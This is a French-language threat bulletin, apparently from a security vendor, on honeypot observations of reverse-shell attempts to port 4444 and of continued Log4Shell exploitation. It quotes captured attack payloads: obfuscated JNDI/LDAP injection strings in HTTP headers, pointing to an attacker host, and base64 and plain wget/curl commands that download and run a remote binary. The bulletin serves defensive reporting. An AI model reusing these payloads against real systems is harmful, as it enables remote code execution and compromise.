En semaine 42, TEHTRIS s’est concentré sur l’étude de deux phénomènes malveillants observés sur son réseau de honeypots.
Sommaire
Tentative de communication via reverse shell sur le port 4444
- 212.2.236[.]244 – AS 62164 (Heymman Servers Corporation) – US
- 23.140.88[.]145 – AS 62164 (Heymman Servers Corporation) – US
45.85.219[.]125:4444
Il s’agit d’un appel vers l’adresse IP 45.85.219[.]125 localisée en Allemagne (enregistrée auprès de l’AS 44486 SYNLINQ) non connue des bases de données publiques en utilisant le port 4444.
Le port 4444 (TCP et UDP) est connu pour être utilisé par les chevaux de Troie et les malwares en général car employé par l’outil de reverse shell très efficace de Metasploit). Il est recommandé de bloquer le trafic vers ce port.
Log4shell toujours activement exploitée
Il s’agit de la vulnérabilité CVE-2021-44228 (CVSS3 : 10), aussi connue sous le nom de Log4shell, qui permet à l’attaquant d’exécuter un code à distance (ou RCE pour Remote Code Execution). Cette vulnérabilité critique concerne Apache Log4J : un logiciel de gestion des journaux utilisé pour le langage Java. Log4J est ainsi utilisé pour gérer les logs des applications en Java, c’est-à-dire pour enregistrer et collectionner les évènements se réalisant dans l’application, par exemple pour écrire toutes les requêtes faites sur un site Internet. L’attaquant a la possibilité de chercher des variables et du contenu pour les afficher.
t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}
${env:BARFOO:-l}dap${env:BARFOO:-:}//168.138.128[.]171:1389
/TomcatBypass/Command/Base64
/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')
wget hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
curl -O hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
chmod 777 openvpn; ./openvpn runner)
["x-api-version: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"bearer: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-client-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'connection: close',
"cf-connecting_ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'accept: application/json, text/plain, */*',
"authentication: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"originating-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-real-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')"]
Ici, l’attaquant a essayé plusieurs façons d’exploiter la vulnérabilité.
Voici 2 autres exemples connus de requêtes qui pourraient exploiter la vulnérabilité en question :
${jndi:ldap[:]//127.0.0.1[:]389/5j9gclyhuddf8k1712mm0mkwn8kb3h6u/${java:os}/${sys:java.vendor}_${sys:java.version}}
${jndi:ldap[:]//168.138.128.171[:]1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}
wget http[:]//168.138.128.171/perl/idsha1game;
curl -O http[:]//168.138.128.171/perl/idsha1game;
chmod 777 idsha1game; ./idsha1game runner
Pour aller plus loin avec l’ANSSI : https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/
Cette vulnérabilité a beaucoup fait parler d’elle depuis sa découverte fin 2021 et est encore activement exploitée un an après.
TEHTRIS recommande de toujours appliquer les mises à jour de vos logiciels dès qu’elles sont disponibles.